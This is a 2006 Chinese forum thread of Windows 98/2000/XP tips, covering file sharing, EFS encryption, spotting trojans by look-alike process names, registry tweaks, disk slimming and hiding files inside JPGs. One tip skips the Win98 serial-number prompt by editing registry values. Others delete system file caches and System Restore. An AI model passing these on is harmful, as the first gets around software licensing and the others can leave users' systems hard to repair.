  这次让我们一起看看Windows XP是如何共享资源,如何提供安全措施保护资源的。   一、多人共用一台计算机上的Windows XP操作系统资源   前提:多个使用者已经在系统中拥有了各自的帐户,并配有密码。每位使用者可在不同的时间段用自己的帐号登陆并使用系统。   1.文件共享   如果想把一些好东西共享给其他使用者分享,如资料文档、电影音乐或图片等各种文件。如下操作:"开始"->"我的电脑",双击打开"共享文档"。     保留此窗口不要关闭,然后打开另一窗口显示将被共享的文件或文件夹。     最后把要共享的文件或文件夹用鼠标拖到"共享文档"的窗口内。     当然使用者要对那些文件有访问的权限,不然拖动的过程系统会报错的。   完成共享。现在任何一位使用者登陆系统后,打开"共享文档"就看到刚才共享的资源了。   2.保护私人资源   多人共用一台计算机,很容易就可打开并修改属于别人的私有文件,Windows XP提供了一个非常有用的功能来防止这种情况出现。属于自己而且不想被别人看的文件或文件夹必须存放在NTFS格式的硬盘分区上,否则不会享有此功能的。   右击要保护的文件或文件夹,选择"属性" ->"高级",勾选"加密内容以便保护数据":     按两次"确定",如果是加密文件夹,这里会多出现一个对话框,提示选择只加密文件夹还是加密文件夹以及里面所有内容,按"确定"。可看到被加密过的文件或文件夹的名字是绿色的。     别的帐号登陆系统是打不开这些加密文件的,也就是说加密文件只能被加密者打开,即使具有最高权限的计算机管理员也是打不开别人加密的文件,但是计算机管理员可以删除任何文件(包括别人的加密文件)。   要注意的是,如果把加了密的文件移动或复制到FAT或FAT32的硬盘分区,加密特性将消失,任何人都可打开它们。   若想解密文件只要按刚才的步骤,去除"加密内容以便保护数据"的勾选即可。   系统为每个帐户都准备了一个以帐户名为名的文件夹,该文件夹存放本帐户的一些配置信息和文档,如桌面设置、开始菜单选项、我的文档、我的音乐、我的图片、收藏夹和Cookies等,要使这个文件夹不被别人查看和随意修改,可按以下步骤来保护:   到系统分区(即有Windows目录的那个分区),打开文件夹"Documents and Settings",找到本帐户名的那个文件夹:     右击选择"共享和安全",勾选"将这个文件夹设为专用",按"确定",这样其他帐户就打不开此文件夹了。      二、共享本计算机的文件给网络用户访问   计算机装有Windows XP操作系统,与其它计算机用网络相连。可按以下步骤把一个文件夹共享出来,让网络用户通过他们自己的计算机来访问你机器上的文件夹:   右击要共享的文件夹,选择"共享和安全",勾选"在网络上共享这个文件夹",可保留或修改"共享名"(这是其他网络用户看到的名称),如果你想别人浏览这个文件夹的同时还可以修改里面的内容,就可以勾选"允许网络用户更改我的文件",按"确定"完成。其他网络用户只要输入你的计算机名或IP地址,就会看到这个共享的了。
作者: 语苛经历    时间: 2006-10-23 21:38
Windows XP 安装好后,如何把FAT 32转化为NTFS

  使用convert命令,在命令行模式下用convert.exe这个命令随时转化的。例如:
convert c: /fs:ntfs把c盘转化为NTFS.
作者: 语苛经历    时间: 2006-10-23 21:42
不可“滥杀无辜” 揭开进程的神秘面纱


对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。


  实例一:和进程的“表演者”交个朋友

  很多时候,我们并没有注意到系统中到底有多少进程。如果想了解进程的秘密,首先就必须和一些常见系统进程交个朋友,一旦掌握了它们,就能像侦探一样迅速从进程名单中发现可疑的家伙。

  在Windows 2000/XP中,Ctrl+Shift+Esc组合键能快速调出任务管理器,而Windows 9X为Ctrl+Alt+Del组合键。

  1.“主角”进程

  首先来熟悉一下系统中的基本进程,它们是系统运行的基本条件,一般情况下不能关闭它们,否则会导致系统崩溃。

  Windows 2000/XP:smss.exe、csrss.exe、winlogon.exe、services.exe、lsass.exe、svchost.exe(可以同时存在多个)、spoolsv.exe、explorer.exe、System Idle Process;

  Windows 9x:msgsrv32.exe、mprexe.exe、mmtask.tsk、kenrel32.dll。

  你知道吗

  进程与程序

  简单地说,每启动一个程序,就启动了一个进程。在Windows 3.x中,进程是最小运行单位。在Windows 9X/2000/XP中,每个进程还可以启动几个线程,比如每下载一个文件可以单独开一个线程。在Windows 9X/2000/XP中,线程是最小单位。程序是永存的,进程是暂时的。举一个例子说:如果程序是剧本,那么表演过程就是进程;如果程序是菜谱,那么烹调过程就是进程。

  人鬼情未了——Svchost.exe

  它位于系统目录的System32文件夹,是从动态链接库(DLL)运行服务的一般性宿主进程。在任务管理器中,可能会看到多个Svchost.exe在运行,不要大惊小怪,这可能是多个DLL文件在调用它。不过,正因为如此,它也成为了病毒利用的对象,以前的“蓝色代码”病毒就是一例。另外,如果感染了冲击波病毒,系统也会提示“Svchost.exe出现错误”。

  如果要查看哪些服务正在使用Svchost.exe,对于Windows 2000可从其安装光盘的SupportToolsSupport.cab压缩包中,将Tlist.exe解压缩至任意目录,接着在“命令提示符”中进入Tlist.exe所在目录,输入“tlist -s”并回车(“tlist pid”命令可看到详细信息)。而在Windows XP则直接输入“Tasklist /SVC”查看进程信息(“Tasklist /fi "PID eq processID"”则可看到详细信息)。

  2.“配角”进程

  这些系统进程虽然不是系统运行必须的,但也经常在进程列表中抛头露面。如internat.exe、systray.exe、rundll32.exe、loadwc.exe、ddhelp.exe、mstask.exe、ctfmon.exe、taskmagr.exe、msnmsgr.exe、wmiexe.exe,它们都是正常的系统进程。

  建议在安装完Windows后,点击“开始→程序→附件→系统工具→系统信息”,在打开的“系统信息”窗口中再点击“软件环境→正在运行任务”(在此进程列表中,可看到更详细的属性,其中程序路径是非常重要的信息),接着点击“操作→另存成文本文件”,以后系统出现异常时则对照进行分析。另外,“优化大师”也提供了保存进程快照的功能●。

  实例二:查找木马的蛛丝马迹

  许多木马和一些防护工具采用了双进程保护手段,例如“Falling Star”木马就采用双进程模式,下面来看看如何发现它们。

  第一步:打开任务管理器。根据和常见进程比较,很明显会发现两个“熟悉的陌生人”(和系统基本进程名称相似,但不相同):“internet.exe”和“systemtray.exe”。请和上一实例中的”配角“进程比较。

  第二步:打开“系统信息”的“软件环境→正在运行任务”,查看路径信息,两者均指向WindowsSystem32目录,而且文件大小、日期均相同,但从文件日期来看并不属于微软的系统文件。进入资源管理器查看其版本属性,虽然公司标明为Microsoft,但与系统文件中的微软公司名称书写并不相同,基本可断定是非法进程,并且为双进程模式。

  第三步:在尝试结束进程时,第一次选择“systemtray.exe”来结束进程树,结果进程马上就再生了,任务管理器中又显示出这两个进程!于是再次选择“internet.exe”,然后结束进程树●。进程没有再生,从而将木马进程从系统中清除。

  实例三:真真假假系统进程

  许多病毒和木马为避免从进程名称中发现它们的踪影,往往会采用“障眼法”,使用和系统文件或系统进程名称类似的进程名称。

  1.文件名伪装

  (1)修改常见程序或进程个别字符

  例如,上面介绍的“Falling Star”木马的进程名称“internet.exe”就与输入法进程“internat.exe”十分相似。“WAY无赖小子”的服务端进程名称为“msgsvc.exe”,与系统基本进程“msgsrv32.exe”类似,还有Explorer.exe和Exp1orer.exe的区别,不仔细的话你能看出来吗?(数字“1”取代了字母“l”)

  (2)修改扩展名

  著名的冰河木马的服务端进程为Kernel32.exe,乍一看很熟悉,好像是哪个系统进程,其实系统根本不存在这样一个文件,Windows 9x的基本进程中却有一个叫做“Kernel32.dll”的。诸如此类的还有“Shell32.exe”的木马进程是从“Shell32.dll”这个大家都很熟悉的文件“演变”而来的,实际在系统中都是不存在的。

  2.路径伪装

  Windows目录和System目录是系统核心文件所在地,一般是“闲人免进”。因此,出入它们的文件一般都被人们认为是系统文件,而病毒和木马就借机将源文件放在这两个目录中。对于这类情况,一般只需要通过系统信息找到其源文件路径,打开文件的属性,从日期(这个非常重要,可以看是否与系统文件日期一样)、版本、公司名称信息中即可看出破绽。没有哪个病毒、木马文件能设计得与系统文件完全一致。

  实例四:优化系统从进程开始

  除系统运行必须的基本进程外,每个程序运行后都会在系统中生成进程,每个进程都会占用一定的CPU资源和内存资源。过多的进程和一些设计不良的进程就会导致系统变慢、性能下降,这时可对它们进行一下优化。






  1.精简进程

  系统中的一些进程并不是必须的,结束它们并不会对系统造成什么损害。

  比如:internat.exe(显示输入法图标)、systray.exe(显示系统托盘小喇叭图标)、ctfmon.exe(微软Office输入法)、mstask.exe(计划任务)、sysexplr.exe(超级解霸伺服器)、winampa.exe(Winamp代理)、wzqkpick.exe(WinZip助手)等。

  有一款叫做“进程杀手”的免费小工具,具备自动精简进程功能,可自动中止系统基本进程以外的所有进程。在怀疑电脑运行了某些黑客进程或病毒进程但又不能确定是哪一个时,该软件就可以有效清除那些非法进程。不过它只适合Windows 9x/Me。下载地址http://www.onlinedown.net/soft/11003.htm

  2.杀死不良进程

  有时你会发现系统运行速度特别慢,这时可打开任务管理器,单击“进程”标签,点击“CPU”列标签让进程按CPU资源占用排序,可以很明显地看到资源占用最高的程序。同样方法,可以点击“内存”列标签,查看那些内存占用大户,及时结束进程。

  这里有一种情况比较特殊:在查看CPU占用率时,一个叫做“System Idle Process”的进程会一直显示在90%左右。不必担心,实际上它并没有占用这么多系统资源,单击“性能”标签可看到其实际的CPU资源占用情况。

  ★对于Windows 9x,使用任务管理器是无法像Windows 2000/XP那样看到所有进程以及CPU、内存占用情况,推荐使用Process Explorer(下载地址http://www.onlinedown.net/soft/19289.htm)。

  ★如果某个16位程序影响了系统运行,而且死活也关不掉,可进入任务管理器的进程选项卡,找到NTVDM.exe进程,将其关掉即可杀掉所有16位应用程序,而不用重启。






  3.优化软件或游戏性能

  你还可以通过改变软件和游戏进程优先级来提高其性能,这样能使它们运行得更快,当然负作用就是可能影响到其他正在运行的进程。比如,为避免刻录缓存溢出问题造成刻录失败,可进入任务管理器的进程选项卡,找到并右击刻录软件的进程项,选择“设置优先级”,然后在弹出的子菜单中选择“高”。如果你不想每次都这样设置,可使用下面的方法。

  第一步:打开软件或游戏所在目录,比如:D:/game,在这里新建一个文本文件,在其中输入以下语句:

  echo off

  start /priority game.exe

  说明:将priority替换为所需的CPU优先级,建议使用high(高)、abovenormal(高于标准),因为它们的效果最好。将game.exe替换为软件或游戏的可执行文件名称,比如:stvoy.exe。

  第二步:做完以上修改后将其保存为game.bat,现在就能通过这个文件来启动游戏或软件,而它将会使游戏或软件具有更高的CPU优先级。不过要注意的是,该文件必须要保存在游戏或软件所在目录。
作者: 语苛经历    时间: 2006-10-23 21:42
不容错过:Win XP减肥十大酷招


是不是觉得Windows XP非常臃肿?不用担心,按照下面的方法可以让你的XP变得苗条一些。

1.删除系统文件备份sfc.exe /purgecache。

2.删除驱动备份windows/driver cache/i386目录下的Driver.cab文件(73mb)。

3.取消系统还原。

4.删除Help档(减掉40多mb)。

5.删掉/WINDOWS/system32/ dllcache下档(减去200——300mb),这是备用的dll档, 只要你已拷贝了安装文件,完全可以这样做。

6.把我的文件、IE的临时文件夹都转到其它硬盘(分区)。

7.把虚拟内存也转到其它硬盘。

8.将应用软件装在其它硬盘(这对重装系统也有好处)。

9.删除/windows/ime下不用的输入法!(日文,韩文,简体中文输入法,84.5MB)

10.如用ntfs装xp,本身就节省硬盘。
作者: 语苛经历    时间: 2006-10-23 21:44
播放RM格式的“断点续播”

你是否只听说过断点续传,没听过断点续播。其实这是可行的。在播放一部比较长的RM影片时,如果中途有事情要关机离开,那么下次想回到上次播放的进度,我们完全可以利用收藏夹来实现。在要中止离开前,打开“收藏夹”菜单,选择“添加到收藏夹”,在打开的对话框中选上“位置”选项,后面的时间也就是当前播放到的进度就有效了。确定后,这个播放片断就被收藏了。这样以后要再次观看时,只需要打开该收藏夹选择它即可从断点处继续观看。

注意,笔者是用Realone Player来实用的,有些realplayer也具备这个功能。


作者: 语苛经历    时间: 2006-10-23 21:44
修改打开方式

我们双击某个文件是必须启动相联的软件来查看的。但是在某些情况下,可能有部分类型的文件系统找不到与之关联的软件,甚至你即便用“打开方式”,也是让你自行去寻找这个程序安装在何处,非常不便。那么我们可以在注册表下迅速进行修改。打开注册表编辑器,定位到“HKEY-CLASSES-ROOT”,在该路径下包括有两大主键“*”、“Unknown”,它们分别对应了所有文件类型和未定义的未知文件类型。因此,我们只需要展开“Unknown”主键,将其下方的所有内容都复制到“*”主键下,然后删除“Unknown”,保存注册表。以后,我们再碰到打不开的文件就可以右击,然后直接选择“打开方式”下的某个关联程序了。

关闭软件自启动

有很多软件都会随Windows的启动而启动,而实际上我们并不需要。要去掉那些不需要随系统启动的程序,可如下操作:在“开始”菜单的“运行”中输入“msconfig”并确定,在打开的对话框中切换到“启动”标签,在这里包含了所有随系统启动的程序,我们只需要将其前面的复选框取消,然后保存,这样就可以取消它们随系统启动的功能了。

注意,Win2000下没有msconfig这个小程序,你需要把WinXP中的msconfig.exe文件拷贝到C盘下。

Win98也玩驱动程序签名

Win2000为了提高系统的安全性,在其系统属性中增加了一个驱动程序签名选项,经过设置可以让那些未经测试的驱动程序不予安装。其实在Win98里面,我们也可以自行添加这样的功能,打开注册表,定位到HKEY_LOCAL_MACHINE\Software\Microsoft\Driver Signing,双击右侧的Policy键值:当其值为00时表示对未签名的驱动程序默认进行安装;其值为01表示遇到安装未经认证的驱动程序时,系统则会弹出警告对话框,可以让我们来选择是否安装;假如其值设为02的话,那么将不允许安装未经微软验证的驱动程序。

“破解”拼音加加

五笔输入法对于初用电脑者很难一下子接收,因此很多人都选用拼音输入法,而拼音加加就是其中的佼佼者。但是,如果安装的是非注册版本的话,那么每次开启IE浏览器都会自动连接到其指定的网站,即使我们修改默认主页也不起作用。那么怎么破解它呢?很简单,将桌面上的IE浏览器的图标拖动放在任务栏的快速启动上,然后右击IE图标,选择属性,在打开的属性对话框的“目标”地址后面加上一个空格,然后输入“-nohome”,保存设置。这样当我们通过该快捷方式启动IE时,就不会直接访问拼音加加指定的网站上了。

Win98的序列号丢失不用愁

你是否遇到这样的情况:安装Windows 98时,要求输入序列号时,发现序列号已经不知去向,该怎么办呢?在一个偶然的机会得到了这么一个小技巧,与那些心太粗的朋友共享。当复制完文件重新启动时,按F8键进入安全模式。在运行框中输入regedit回车,也就是运行注册表编辑器,依次打开主键HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion,把ProductId、RegisteredOrganization、RegisteredOwner的值改为任意几个字符。然后重新启动电脑,电脑就会跳过序列号输入对话框,直接进行未完成的安装。
作者: 语苛经历    时间: 2006-10-23 21:45
让XP开口说英语

我们在使用各种软件的过程中,经常会遇到不认识的单词,不知道它的正确读法。以往都要借助专用的工具才能解决。现在如果你使用的是XP的话,那么这一切都可以解决。在开始菜单的运行里输入“narrator.exe”,这样就会打开一个名为“讲述人”的程序,有了它我们就可以读菜单命名、对话框选项等英文单词了。如果你觉得语速过快,还可以点击“声音”按钮来改变声音和语速等内容。

大文件搬送我也行

在Win98下,通常是不能执行单次复制或移动内容超过2G以上的操作。造成这个问题的原因就是Windows\system\shell32.dll文件引起的。如果想复制2G以上的内容,那么我们必须绕开这个限制。当然解决的方法也很简单,只需切换到MS-DOS方式,然后使用COPY命令即可(或者用XCOPY进行目录及其子目录的拷贝)。你可不要告诉我不会使用DOS命令哟。

在Google中打开新窗口

Google搜索引擎可以说稳坐当今搜索引擎网站的头把交椅,但是它有一个弱点,那就是当我们想查看搜索到的内容时,在默认情况下它是在当前窗口来显示,这样如果我们想查看其它搜索到的内容,只能点击“后退”按钮返回,那么有没有办法改变呢?其实只需要点击链接时,按住Shift,这样就会在新的窗口显示链接内容了。当然,这个方法也适用于所有链接^_^。

自动检查备份文件的完整性

GHOST是一款优秀的硬盘备份恢复软件,但是其使用有一个缺点,那就是一旦执行恢复操作将使原来的硬盘(分区)内容全部丢失。如果用来恢复的映像文件有错误,恢复不成功后就只有重装系统了。因此我们可以来检查一下映像文件是否完好。在命令提示符下输入“ghost.exe -chkimg,F:\backup\win2000.gho –sure”,这样就会使用GHOST自动对F:\backup\win2000.gho文件进行检查。

连续抓取D-Player图片

我们在论坛上经常会看到跳街舞的签名档,想知道这些签名档是怎么制作出来的吗?呵呵,其实这最关键的是图片的截取。我们知道比较流行的学街舞软件是D-Player,我们现在就借助它,启动该软件,并观看,然后按下Ctrl+Alt+S键,这样就会自动保存当前屏幕上的截图,如果要停止时,再按下Ctrl+Alt+E组合键,这样程序就会自动记录两次快捷键上所有图片的变化。现在只需要再按下Ctrl+Alt+C就可以打开图片保存对话框了。

减少硬盘读写次数

我们知道,在下载软件时FlashGet会频繁地读写硬盘,这可能会导致硬盘出错,因此我们应该控制硬盘的读写错误。启动FlashGet,打开工具菜单下的“选项”命令,在“常规”选项卡中,将“把数据写入到磁盘每当接收到”的参数设置的大一些,这样就可以减少硬盘的读写次数,提高硬盘的使用寿命。

播放速度测试好轻松

超级解霸是我们使用比较多的多媒体音频视频播放软件,但是是否知道通过超级解霸我们能测试电脑播放的最大帧数。在播放的过程中,将其停止,然后按下Ctrl+Alt+T,这样就会显示出我们所需要的数据了。

Nero玩转超长刻录

我们在刻录光盘时,往往狠不得把所有的空间都使用起来。其实只要经过必要的设置,我们完全可以榨干刻录光盘的每一寸空间。在Nero中打开“文件”菜单下的“优先选项”命令,在弹出的对话框中选择“专家功能”选项卡,将其中的”启用一次性过量刻录,然后设置最大光碟长度,最后保存设置。经过这样的设置,当我们再次超录的内容超出空白容量时,虽然会弹出警告对话框,我们仍然可以刻录。不过,这样刻录也有一定的要求,那就是刻录机要支持超刻,并且你还需要测试一下超刻时间。选Nero的“Nero CD Speed”,在“Extra”下选“Overburning test”,记得模拟写入“simulate”一定要勾选。
作者: 语苛经历    时间: 2006-10-23 21:47

操作技巧大放送三

现在很多软件都会在任务栏的托盘中生成其软件图标,本来这样的设置是为了方便我们的使用,但是托盘中的图标很多时也带来一些麻烦,不仅影响桌面的整洁,还占用了不少系统资源,因此有必要对托盘中的图标来个大清理。

清理任务栏图标

首先清理的系统图标主要有输入法、声音调节、网络连接属性等等。这些系统图标是否显示并不影响我们的使用,例如设置输入法的快捷键就可以完全不显示输入法图标,而网络连接属性只是起到显示状态的作用,是否显示是没有关系的。其中输入法和声音调节分别在“控制面板”中的“输入法”和“多媒体”中进行设置,取消其中的在任务栏中显示图标即可(图1)。

网络连接属性只有在Win2000和WinXP中才能显示,如果你有多个网络设备,那么会显示多个图标,你可以在“网络属性”中的每个连接设备的属性中进行设置。

其次就是清理启动项。因为有很大一部分托盘图标都是由启动项生成的,例如计划任务、MSN等,我们完全可以在使用时在进行启动。清理启动项很简单,你可以利用MSCONFIG程序进行选择,或者利用专门的软件,例如超级兔子。清除时需要注意,有些项目是系统运行必需的,如果有些项目你拿不定主意最好不要删除。还有如果你使用的是Win2000,那么MSCONFIG程序是没有的,你需要到WinXP下去拷贝一个。


自动补全文件名

在WinXP中你可以使用“Tab”键来自动补全文件名。例如你想进入“Program Files”目录,那么你可以输入“cd p”,然后在按“Tab”键系统就可以自动补全目录名,如果系统中有多个以P开头的目录,那么你连续的按“Tab”键可以在这些目录之间进行切换。

默认情况下Win2000中是没有此项功能的,你首先需要打开自动补全的功能,利用“cmd /fn”就可以打开。但是和WinXP中不同,Win2000中的快捷键是“Ctrl+D”和“Ctrl+F”,其实“Ctrl+D”是自动补全目录名,而“Ctrl+F”既可以补全目录名同时也可以补全文件名。其实CMD还有很多参数,你可以输入“cmd /?”查看详细的帮助信息。

让泡泡像QQ一样使用

网易泡泡是网易新推出的一款及时通讯软件,目前非常火爆。和其它的及时通讯软件相比,它在技术上并没有什么太多新意,但也并不能说其没有亮点。它集QQ和MSN的优点于一身,因此一发布就在网上广泛的流传。其使用上没有什么太多的难度,但是掌握一些技巧还是能方便你的使用。

很多人习惯了QQ那种聊天方式,也就是利用快捷键打开聊天窗口,回复后聊天窗口自动关闭,这样可以加快聊天的速度。其实在泡泡中也能实现这样的功能。首先在泡泡的菜单“工具/系统配置”中选择“系统参数”,并在其中选中“使用热键弹出对话窗口”,同时设定快捷键。然后打开聊天窗口选中菜单“查看/自动关闭窗口”,这样就可以让泡泡像QQ一样聊天了。

在QQ中你可以通过修改头像图片来设置自己的个性头像,但是这样设置的头像对方是无法看到的,而在泡泡中设置的个性头像,对方同样可以看到。选择主窗口菜单“工具/个人设置”,在“基本信息”中选择“上传头像”,选择你需要上传的图片即可。需要注意的是,图片的格式只能为GIF、JPG、BMP,并且大小不能超过5K。保存设置,这样对方就可以看到你个性图片了。同样对方设置的个性图片你也可以看到,但是这样看到的图片很小,那么你可以点击这个用户选择右键中的“个人资料”,在“基本信息”中选择“原样显示”(图3),这样就可以看到完整的图片了。

网易泡泡还可以非常方便地邀请你的好友,使用很简单,只要选择菜单“工具/邀请我的联系人”,泡泡就能自动搜索出系统MSN中的好友列表。选择你需要通知的好友,直接按“下一步”,就可以向这些好友发送邮件,邀请他们加入泡泡的行列。当然如果你的系统中并没有安装MSN,那么你是无法使用次项功能的。

快速从CAB中解压文件

Windows系统运行时需要用到很多系统文件,但是错误的操作或者其它意外的情况都有可能造成这些系统文件的损坏或者丢失,此时系统中就会出现错误的提示。遇到这样的情况解决方法并不难,从安装包CAB中找到相对应的文件,解压进行覆盖就可以解决问题。但是从CAB文件中逐个查找会很麻烦,那么利用下面的办法可以快速地从CAB提取文件。

首先将Windows安装光盘中所有的CAB文件拷贝到硬盘上,比如F:\windows中,然后建立临时目录用来存放解压的文件。例如想要解压midimap.dll文件,那么你可以输入“for %i in (f:\windows\*.cab) do extract %i midimap.dll”,不一会儿该文件就已经解压完毕。

如果你觉得每次输入这样长的命令很麻烦,那么你完全可以利用批处理文件来实现这一命令。打开文本编辑器,在其中输入“for %%i in (f:\windows\*.cab) do extract %%i %1”,然后保存为批处理文件,例如ex.bat。这样当你需要解压时,只需要输入“ex 文件名”就可以完成解压的工作。

妙取鼠标位置

作为自由撰稿人,笔者经常要抓取各种各样的图片,而很多时候为了让读者明白自己所讲的内容,在图片上 都注明了鼠标的指向位置,但通过一般的抓图方法却很难连同鼠标指针一起抓下。其实我们可以借助著名的抓 图软件HyperSnap-DX4来帮助我们。打开“Capture”菜单下的“Capture Setting”项,把“Include Cursor
image”选项,这样就能够在抓取图片的时候连同鼠标指针位置一起保存了。

妙用智能ABC输入法V键

智能ABC以其快捷、智能获得了众多用户的喜欢,其实使用该输入法不仅可以可以快速输入汉字,而且还可以 快捷输入各种特殊的符号呢?切换到智能ABC输入法,然后输入字母V,这个时候只需要按下小键盘上的数字键,你就会看到很多特殊的字母,而且你按下不同的数字键还能输入不同的特殊符号呢!

美化你的菜单栏

整天要盯着微软那灰底黑字的菜单栏,真的让人很心烦。其实我们还是有很简单的办法修改菜单栏的显示效 果的。打开桌面属性,转到外观选项卡,然后在“项目”中选择要修改的菜单栏,这样菜单栏的颜色和字体都 处于可编辑状态,这样你就可以随心所欲的调整了。


不断的充实自己非常关键,正所谓“活到老,学到老”。在这个充满竞争的社会,只有加强自身的修养,扩充自己的知识面(比如多来来arongsoft,嘿嘿),才能真正使你立于不败之地。

[此贴子已经被作者于2006-10-23 23:13:13编辑过]

作者: 语苛经历    时间: 2006-10-23 21:47
操作技巧大放送六
妙用F11键让界面全屏化

大家都知道F1键可以打开程序的帮助文件,但是对于F11键的功能就可能不知道了。F11有一个很妙的用处,就是可以实现选中界面的全屏显示。比如随便打开一个文件夹,然后按下F11键就可以获得最大的可视界面了。其实,键盘上的所有功能键都能给我们提供方便,比如,你想修改某个文件名,选中后按下F2键,就可以修改了。

关于智能ABC“零”的输入

在中文输入年分的零,常见的大多是用“0”来代替,而很难输入这样的“○”。其实要想输入这样的“○”很简单,只要在切换到智能ABC输入法,然后再输入一个“i”,在“i”后再输入阿拉伯数字“0”并按下空格键,一个正宗的“○”就出现了。

设置启动屏保快捷键

Windows的屏幕保护程序存放在文件夹C:\WINDOWS\SYSTEM中,后缀为SCR,双击该文件,就可以启动相应的屏幕保护。如果我们给该屏幕保护程序建立快捷键,那么启动会更加方便和简单。

在Windows中搜索到该SCR文件,然后在它上面点击鼠标右键,选择“发送到\桌面快捷方式”。而后在桌面找到该快捷方式,在其上面点击鼠标右键,选择属性,将光标移动到弹出框中的快捷键栏中,而后按下自己需要的启动快捷方式即可。

让智能陈桥帮你学五笔输入

智能陈桥可以说是目前使用较多的一款中文输入法。其实,通过它我们可以学习五笔输入。在智能陈桥输入法上右击,选择“参数设置”菜单下的“汉字输出设置”,在打开的窗口中选“拼音输出时提示五笔编码”,最后保存设置。这样遇到五笔打不出的字时,就可以切换到陈桥的拼音输入状态,输入汉字后就可以在窗口中显示其五笔编码了。

让压缩没有错误

笔者经常收到朋友发送过来的ZIP文件却不能打开,真是误事。其实发送方是可以在发送前先测试一下文件的有效性的。在压缩成ZIP文件后,只要在窗口中按下Shift+T键,就可以测试ZIP文件是否有效了。

WORD中竖选文字

你知道在WORD中怎么竖选文字吗?不知道了吧?只需按下ALT键,然后拖动鼠标就可以实现竖选文字了。

打造方便的开始菜单

打开“开始”菜单,你会发现其顶部有几个特定的程序,让我们启用它们非常方便。其实,我们也可以定制开始菜单顶部显示的程序。将自己经常要用到的程序或文件直接拖放到“开始”按钮上,这样就会自动把该程序添加到开始菜单的顶部了。

文件管理器让隐藏分区无处可藏

文件管理器是WIN3X时代的产物,到了WIN9X之后就被资源管理器代替了。其实在WIN9X中我们可以在运行中输入Winfile来运行它。你可别小看了它,当有人通过一些方法把硬盘分区隐藏起来的时候,我们运行文件管理器就可以查看到,因为查看的原理有所不同,所以在文件管理器下可以显示所有分区,这当然也包括隐藏起来的分区了。

让复制文件加速

当我们向软盘复制比较大的文件时,看着那一格一格的慢慢移动真是急死人。实际上,我们可以修改注册表来加快传输速度。打开注册表找到“HEKY-LOCAL-MACHINE\System\CurrentControlset\Services\Class\FCD\000”,然后新建一个DWORD值,命名为Fore-Fifo,并且将其键值设定为0,这样在一定程度上可以提高复制文件的速度。

Win2000卸载高版本DirectX

当你想自己的电脑更时髦,安装了最新测试版本的DirectX,殊不知这些测试版本使你的电脑变得不稳定,想卸载它们也不知从哪里下手,怎么办?其实在Win2000下,那么你只需要将安装光盘放进去选择从光盘启动,选择紧急修复,等修复完毕之后你就会发现测试版的DirectX已经被替换了。

批量运行

在WinXp中,我们可以在运行中一次输入多个命令来运行。其格式是“1.exe && 2.exe”这样在运行了第一个命令后就可自动运行第二个文件,如果是“1.exe || 2.exe”这样的格式,那么就表示如果第一个命令不能执行就执行第2个命令。
作者: 语苛经历    时间: 2006-10-23 21:48
操作技巧大放送六

备份是非常重要的。除了备份,加密也是我们使用计算机非常需要重视的。

提到加密,相信你想到的肯定是那些专业的加密软件。使用这些软件可以进行很复杂的加密功能,但是使用起来还是略显麻烦,特别是在解密时很有可能无法自动完成解密功能,其实如果你仅仅只是需要进行简单的加密,利用Winrar就可以实现。本来Winrar是一款非常优秀的解压缩软件,但是我们如果合理的利用其功能同样可以实现加密的工作。

神奇的Winrar加密

下面阿榕来说说具体的操作,首先找来一张图片,在其上点击鼠标右键,选择菜单中的“添加到压缩文件”,这时就会显示其设置窗口(图1)。





图1


其它的地方不需要设置,重要是设置其“压缩方式”为“存储”,其实也就是不压缩,设置完成保存文件。接着你就可以向这个文件添加其它的格式文件了(如TXT文件,但千万不要是图片文件哟,否则就没有隐藏的意义了),简单的方法就是直接将需要添加的文件拖放到该压缩文件中即可完成添加的工作。最后要做的事情就是将压缩文件的扩展名改为最开始图像文件的扩展名,由于默认情况下Windows不会显示常用文件的扩展名,你需要在DOS窗口中完成这一工作。例如压缩文件为see.rar,而以前的图片格式为jpg,那么执行的命令为“ren see.rar see.jpg”,这样压缩文件就变成了图片,你可以用任意图像软件进行浏览。别人从表面上看到的只是一个图片,而并不知道图片中还包括有其它的文件,当你需要使用该文件时只需要修改成为RAR格式即可。

经过测试并非所有的文件都支持这种加密方式,暂时只发现JPG和MP3文件可以支持。在进行加密时一定要保证用来伪装的文件是第一个添加,并且压缩方式一定要为存储方式。

宽带的普及使得我们观看网上的视频成为可能,但是在实际使用中经常会出现视频播放不流畅的问题,这除开网络速度的原因外,本地播放器的优化也很重要,在这里我们以RealPlay为例说明播放器如何进行优化的工作。

优化RealOne Player,播放更流畅

运行软件并打开其菜单“Tools/Preferences”,优化设置基本上都在这个选项中进行。在“Conneciton”是关于网络连接的一些设置,首先就是设置网络带宽类型,一般来说将此项设置为最高,也就是在“Normanl”和“Maximun”中都选择“Corporate LAN (10 Mbps)”(如图2,你也可在安装时设置该项)。





图2


接着是“Conneciton/Playback Settings”中的缓存设置,缓存的作用是将远程的数据先保存到本地,这样可以提高播放的效率。其默认数为30秒,在实际使用过程中,笔者发现设置成为60妙效果最高。

刚才设置的是缓存的时间,在“Content”中还有缓存容量的设置。选择其中的“Settings”按钮即可打开容量设置窗口,其默认的设置仅仅只有4M,这显然不能满足我们的要求,建议设置成为15M左右。最后涉及到的是“Hardware”项目,里面都是关于硬件加速的一些设置,一般情况下是无需改动的,因为系统已经默认设置为最优。但是如果在播放时出现错误,可以降低硬件的优化以达到正常播放的效果,里面主要分为显卡和声卡的设置。

以上仅仅只对RealOne Player优化设置进行了简要说明,其实很多在线播放软件都有类似的选项,例如Windows Media Player,都可以参照上面,进行类似的设置。

对于小滔来说,QQ不仅仅只是一个聊天工具,它更是工作上的好帮手,联系小编、解决问题都离不开它的帮助。但是最近QQ老是出一些奇怪的问题,虽然并不影响其功能,但是还是在使用上造成了一些麻烦。有问题该怎么办,解决才是关键。

解决QQ故障两三例

默认情况下,我们都是将QQ放在桌面的边缘,这样它能自动缩进去。当你的鼠标移动到边缘时QQ又可以出现,这是个很方便的设计,但是最近笔者使用时却遇到麻烦。只要将任何窗口最大化,再移动鼠标到桌面的边缘QQ就无法显示了,开始以为是QQ版本的问题,但是不管安装什么版本问题依旧,在不断的设置之后发现了问题的根源。打开QQ的设置窗口(图3),





图3


